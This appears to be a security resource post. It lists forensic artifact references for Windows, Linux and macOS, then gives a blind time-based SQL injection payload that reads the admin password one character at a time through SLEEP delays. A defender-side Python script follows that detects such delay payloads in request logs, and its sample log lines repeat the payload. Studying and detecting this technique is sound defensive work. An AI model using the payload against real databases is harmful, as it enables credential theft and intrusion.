Here are some forensics resources.
Windows Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/windows.yaml
2. https://sans.org/security-resources/posters/windows-forensic-analysis/170/download
3. https://digital-forensics.sans.org/media/SANS_Poster_2018_Hunt_Evil_FINAL.pdf
Linux Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/linux.yaml
MacOS X Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/macos.yaml
SANS Institute
Windows Forensic Analysis
The “Evidence of...” categories were originally created by SANS Digital Forensics and Incident Response faculty for the SANS course FOR500: Windows Forensic Analysis. The categories map a specific artifact to the analysis questions that it will help to answer.…
Exfiltrate data through a blind SQL injection in a SELECT clause.
SELECT SLEEP(ASCII(SUBSTRING((SELECT password FROM users WHERE name = 'admin'),1,1))/2);
Converts the output of the SUBSTRING query to its ASCII code, divides it by two, then sleeps for that many seconds (the response time gives the character code).
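Defender-side view of the technique above, as an added example that is not part of the original post: it scans request logs for SQL delay functions and uses the response time to separate attempted payloads from ones that actually executed. The log format, paths, client addresses and the `find_timing_extraction` helper are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log (not from the page): client, request line, response seconds.
SAMPLE_LOG = """\
10.0.0.5 "GET /report?col=name HTTP/1.1" 0.04
10.0.0.9 "GET /report?col=SLEEP(ASCII(SUBSTRING((SELECT%20password%20FROM%20users%20WHERE%20name%3D'admin'),1,1))/2) HTTP/1.1" 56.03
10.0.0.9 "GET /report?col=SLEEP(ASCII(SUBSTRING((SELECT%20password%20FROM%20users%20WHERE%20name%3D'admin'),2,1))/2) HTTP/1.1" 48.52
10.0.0.7 "GET /report?col=sleep%20(5) HTTP/1.1" 0.03
10.0.0.5 "GET /export?format=csv HTTP/1.1" 12.10
"""

LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" ([\d.]+)$')
# Delay primitives of common SQL dialects (MySQL, PostgreSQL, SQL Server).
DELAY = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# Single-character reads: SUBSTRING(<expr>, <position>, 1)
CHAR_READ = re.compile(r"\b(?:substring|substr|mid)\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)", re.I | re.S)


def find_timing_extraction(log_text, slow_seconds=5.0):
    """Map each client that sent a delay-function payload to what it achieved.

    executed  -> at least one such request was slow, so the delay really ran
    positions -> character offsets read one at a time (shows extraction progress)
    """
    found = defaultdict(lambda: {"executed": False, "positions": set()})
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        client, target, seconds = m.group(1), unquote_plus(m.group(2)), float(m.group(3))
        if not DELAY.search(target):
            continue  # slow but benign requests are ignored
        entry = found[client]
        if seconds >= slow_seconds:
            entry["executed"] = True
            read = CHAR_READ.search(target)
            if read:
                entry["positions"].add(int(read.group(1)))
    return {c: {"executed": e["executed"], "positions": sorted(e["positions"])}
            for c, e in found.items()}


if __name__ == "__main__":
    for client, info in find_timing_extraction(SAMPLE_LOG).items():
        print(client, info)
```

A client marked `executed` with a growing list of positions indicates a live injection point that is being read character by character; a client with `executed` false sent the payload but the delay never ran.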